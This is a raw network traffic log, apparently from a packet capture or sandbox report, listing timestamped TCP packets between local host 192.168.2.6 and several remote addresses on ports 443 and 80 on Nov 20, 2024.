                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.351301908 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.356178045 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.362849951 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.362905025 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.362938881 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.366153002 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.366202116 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.366213083 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.370872974 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.370934010 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.370942116 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.375459909 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.375500917 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.375519037 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.375544071 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.375633955 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.379998922 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.384612083 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.384653091 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.384670019 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.384686947 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.384807110 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.388834953 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392374992 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392410040 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392441988 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392451048 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392463923 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.392505884 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.397372961 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.397447109 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.397470951 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.401624918 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.401684999 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.401705027 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.404694080 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.404827118 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.404932022 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405129910 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405139923 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405148983 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405153036 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405579090 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405642033 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.405662060 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.409216881 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.409229040 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.409296036 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.409830093 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.409838915 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.410011053 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.410078049 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.410095930 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.412528038 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.412583113 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.412597895 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.415160894 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.415251970 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.415266037 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.417692900 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.417752028 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.417766094 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.420264959 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.420330048 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.420344114 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.422849894 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.422907114 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.422920942 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.425662994 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.425714970 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.425728083 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.427927017 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.427979946 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.427993059 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.428284883 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.428339958 CET44349777142.250.184.228192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.428421021 CET49777443192.168.2.6142.250.184.228
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.980473995 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.981210947 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.981228113 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.981726885 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.981731892 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.988763094 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.989356041 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.989381075 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.989825964 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.989831924 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.993254900 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.993758917 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.993772984 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.994168997 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.994174004 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.998218060 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.998552084 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.998558998 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.998963118 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:24.998967886 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.082536936 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.083255053 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.083267927 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.083760023 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.083764076 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.088805914 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.088850975 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.089123964 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.089164972 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.089174032 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.089200974 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.089205980 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.092434883 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.092484951 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.092551947 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.092741966 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.092758894 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108227015 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108304977 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108542919 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108575106 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108583927 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108594894 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.108599901 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110035896 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110097885 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110184908 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110335112 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110340118 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110349894 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.110353947 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111263990 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111608028 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111680984 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111694098 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111721039 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111761093 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111819029 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111823082 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111835003 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.111839056 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.112724066 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.112736940 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.112865925 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.113009930 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.113020897 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.113116980 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.113125086 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.114496946 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.114506006 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.114573002 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.114708900 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.114716053 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.193886995 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.193943024 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.194154024 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.194425106 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.194434881 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.194443941 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.194447994 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.197165012 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.197180033 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.197257042 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.197411060 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.197421074 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.736253977 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.738296032 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.738312960 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.738959074 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.738965034 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.759854078 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.760463953 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.760477066 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.761086941 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.761092901 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.795950890 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.797041893 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.797065020 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.797992945 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.798007011 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.801754951 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.804486990 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.804500103 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.805206060 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.805212021 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.828443050 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.828476906 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.828538895 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.828691959 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.828704119 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.841361046 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.841922045 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.841984034 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842403889 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842413902 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842427969 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842506886 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842506886 CET49795443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842518091 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842526913 CET4434979513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842890978 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.842895031 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.845578909 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.845612049 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.847225904 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.847450018 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.847467899 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.862895966 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.862963915 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.863177061 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.863217115 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.863226891 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.863236904 CET49796443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.863241911 CET4434979613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.866188049 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.866219044 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.866286993 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.866405964 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.866420984 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909054995 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909213066 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909303904 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909581900 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909596920 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909606934 CET49797443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.909612894 CET4434979713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.911691904 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.911773920 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.911869049 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913130045 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913168907 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913254976 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913355112 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913367987 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913381100 CET49798443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913384914 CET4434979813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913665056 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.913682938 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.915975094 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.915998936 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.916068077 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.916203022 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.916215897 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943115950 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943173885 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943243027 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943593025 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943598032 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943608999 CET49799443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.943612099 CET4434979913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.946918011 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.946953058 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.947041988 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.947196007 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.947211981 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.284648895 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.284722090 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.478179932 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.478408098 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.478431940 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.479474068 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.479542971 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.480534077 CET49802443192.168.2.6142.250.186.46
